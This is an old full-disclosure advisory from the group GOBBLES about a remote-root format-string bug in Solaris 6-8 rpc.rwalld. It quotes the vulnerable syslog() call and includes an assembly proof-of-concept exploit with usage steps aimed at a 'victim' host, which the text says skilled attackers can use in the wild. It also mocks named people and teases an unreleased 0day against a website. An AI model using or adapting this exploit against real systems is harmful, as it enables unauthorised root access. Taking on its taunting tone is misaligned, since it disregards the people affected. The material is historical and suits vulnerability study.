-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 GOBBLES SECURITY ADVISORY #32 ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT! Forward: <@route> so was fydor trying to make his code unreadable when he write nmap? <@route> or was that just the fallout of poor planning? <@route> this is awful <@route> if ( !victim || !sport || !dport || sd < 0) { <@route> fprintf(stderr, "send_udp_raw: One or more of your parameters suck!\n"); <@route> free(packet); <@route> return -1; <@route> } <@route> This is the program that is used everywhere and written up in countless books? <@route> it's pretty much obscene that this program doesnt use libnet Systems Affected: Sun Solaris 6, Sun Solaris 7, Sun Solaris 8 (sparc and x86 versions) Threat Level: Super duper high. Vendor Notification Status: Initial advisory sent to Sun Microsystems on Friday, April 5th. After long series of email exchange, Sun.com engineers finally begin working on developing patch for bug. Days later, CERT contact GOBBLES about bug. Dialouge happen then too with CERT. Both Sun Microsystems and CERT have promised to make sure that GOBBLES name is in both official advisories released. Hey, we do this for fame and attention, now that we are no longer weaned we must do something! Some time, full disclosure is real pain in ass. Everyone want more and more time to get things fixed before advisory is released. Time to grace lists with more GOBBLES Advisory. Exploit: A proof-of-concept exploit for this vulnerability has been attached to the bottom of this email. GOBBLES wrote it in way to keep unskilled from using it, like security assesment team from Vigilante who not able to tell if vulnerability is real or not in opensourced product after reading advisory. At the same time, skilled penetrators should not have any trouble using the code provided to exploit systems in the wild. Don't send GOBBLES email asking for other versions of exploit. Some things better left private and given to close friends for their own motivations. If you can't figure out how to work with this exploit and get remote root from what is provided in the advisory, really there is no reason for you to be using an exploit. A Few Words: There are some thing that GOBBLES have to say, some thing very heartfelt that he need to communicate to the world, some thing that best said in song, please take time to read lyric and understand what GOBBLES trying to say. . . "the sun has blessed the rays are gone and all the kids have left their tears and gone home, sweet 17, sour 29 and i can't explain myself what i'd hoped to find you were all so kind when i was near, and if you're still feeling down then maybe you need me around to love and hold you don't say i hadn't told you so maybe you need me around, i had no luck i had no shame i had no cause just seventeen days of rain and you in my eyes, just one more song to slay this earth and i can't explain myself just what it's worth what was all i had but not all i'd need and i can't escape the fact that i still bleed, and if you're still feeling down and if this seems way too loud then maybe you need me around, i had no voice i had no drive i had no choice i've done my time had myself had my band i had my love had no hand in watching it all fall apart and if you're still feeling down then maybe you need me around to lift and scold you to send you crashing all right now maybe you need me around." - -Blissed and Gone, the Smashing Pumpkins Description of Problem (Part One): One of the default RPC services in Sun Solaris versions 6-8 is has an insecure syslog() statement, which allow remote attacker to execute custom code as root. Hehe, GOBBLES bet you getting pissed because in all this length of advisory, still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep control of temper, and keep reading, because you about to find out, hehehe GOBBLES is silly today. Remotely Exploitable: Yes. Locally Exploitable: Yes. Privilage Attained After Exploitation: Root. Exploit Included: As GOBBLES did mention previously, yes. It get you root. Girls will be impressed with mailing list reading skills and source code leeching technique utilized to gain remote root to Solaris machines. Included exploit for Sparc. Name of Vulnerable Service: $ grep rwall /etc/inetd.conf # The rwall server allows others to post messages to users on this machine. walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld It rwalld that vulnerable. It run as root. Attacker get root from exploiting it. Description of Problem (Part Two): Inside rwall_subr.c we see: /* * Make sure the wall programs exists, is executeable, and runs */ if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 || (fp = popen(WALL_PROG, "w")) == NULL) { syslog(LOG_NOTICE, "rwall message received but could not execute %s", WALL_PROG); syslog(LOG_NOTICE, msg); Bug easy enough to spot, but now question is, "GOBBLES, friend, how is this to be exploited? Faulty syslog() only called if rpc.rwalld can not execute /usr/sbin/wall on local system, which mean it only exploitable if admin have chmod -x or rm /usr/sbin/wall or something like this, right, so why this so such a big deal?" To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is to make popen() fail, there one other way to exploit bug, which make it dangerous and affect all installation of Solaris running rpc.rwalld, is that popen() to fail if there no available file descriptors on system." This easier to exploit locally on system. For remote exploitation, timing is important and thus is race condition. Each new tcp session to running service on target host will consume filedescriptor. Then run attached exploit to have root handed over, like operator status given to route in #phrack with no question ask. Patch Available: Fucked if GOBBLES knows. Suggested Workaround: GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch made available, then restart it, if you wait until patch available until upgrade you probably have to do upgrade by reinstalling operating system, because now exploit out and probably in hands of less than ethical penetrator looking to abuse you in one way or another. Security Candy: - -begin copy- /* Remote Root Exploit for Solaris 6-8 rpc.walld Usage Instructions: 1. Compile. gcc -o xwall xwall.s 2. Run. (./xwall ; ./shellcode) | rwall victim 3. Late Easter egg. strings xwall Note(s): Something else must be done to consume FD's on victim system. Figure this one out for self. This exploit written to be run on Linux. Supplied format string is for Sparc Solaris. Provide own remote shellcode and use as above described. Love, GOBBLES Security http://www.bugtraq.org GOBBLES@hushmail.com */ retloc: long 0x41424344 retaddr: long 0x60bb135 padding: long 4 walkcount: long 1 globl main type main,@function main: pusha movl (padding),%ecx jusfhds7fg: pushl %ecx movl $4,%eax movl $1,%ebx pushl $0x00000041 movl %esp,%ecx movl $1,%edx int $0x80 popl %ecx popl %ecx loop jusfhds7fg movl %esp,24(%esp) pushl $0x42424242 movl $4,%edx movl %esp,%ecx movl $1,%ebx movl $4,%eax int $0x80 movl (retloc),%eax bswapl %eax pushl %eax subl $4,%ecx movl %edx,%eax int $0x80 addl $4,%ecx movl %edx,%eax int $0x80 subl $4,%ecx popl %eax bswapl %eax incl %eax incl %eax bswapl %eax pushl %eax movl %edx,%eax int $0x80 popl %eax movl %esp,%edx incl %edx xorl %esi,101(%ebp) andb %al,111(%edx) popa pushl %edx andb %al,97(%ebx) decl %esi aaa andb %al,111(%ebx) incl %esp xorl (%ecx),%eax movl (walkcount),%ecx cmpl $0,%ecx je nczxhczjcg89zg89 pushl %ecx movl $4,%edx movl $1,%ebx pushl $0x78382e25 cmzxnczxcz8c: pushl %ecx movl %esp,%ecx addl $4,%ecx movl $4,%eax int $0x80 popl %ecx loop cmzxnczxcz8c popl %ecx popl %ecx nczxhczjcg89zg89: movl (retaddr),%edx pushl %edx shr $16,%edx subl %edx,(%esp) movw $0,2(%esp) pushl %edx shll $3,%ecx subl %ecx,(%esp) movl (padding),%edx subl %edx,(%esp) subl $16,(%esp) movw $0,2(%esp) pushl $cznxczxczxh8 call printf movl $1,%eax int $0x80 cznxczxczxh8: string "%%%uc%%hn%%%uc%%hn\n" - -begin paste- Greets: route, because route deserves attention, use libnet it rulez. route, why you refuse GOBBLES interview on supposed intrusion on @stake subnet that was allowed when some malicious local user ran trojaned blackhat warez? GOBBLES need to confirm with you if this really did happen, please respond soon... Tracy@mp3.com, the Official Sysadmin Mascot of GOBBLES Security. Thanks for letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next advisory will be disclosure of 0day CSS holes in mp3.com's website... w00w00 Security Development, publishing advisories at the blinding speed of 1 per 3 years, and still being the largest active nonprofit security group in the world, to the eyes of the public. Disclosure is good when it serve a political agenda, hehehehe... The Securityfocus Staff, who often reject the legitimate research materials of GOBBLES from their lists, but make sure they archive it on their website anyways. Thanks for at least giving us some of the credit that we deserve. In the future, though, if our submissions don't meet your requirements for publication on the lists, don't put them on your website. Enough of this double standards bullshit. zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect. and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv show Alias, who many member of GOBBLES Security is in love with. You win free GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe! Hush provide the worlds most secure, easy to use online applications - which solution is right for you? HushMail Secure Email http://www.hushmail.com/ HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ Hush Business - security for your Business http://www.hush.com/ Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ== =jCTV -----END PGP SIGNATURE-----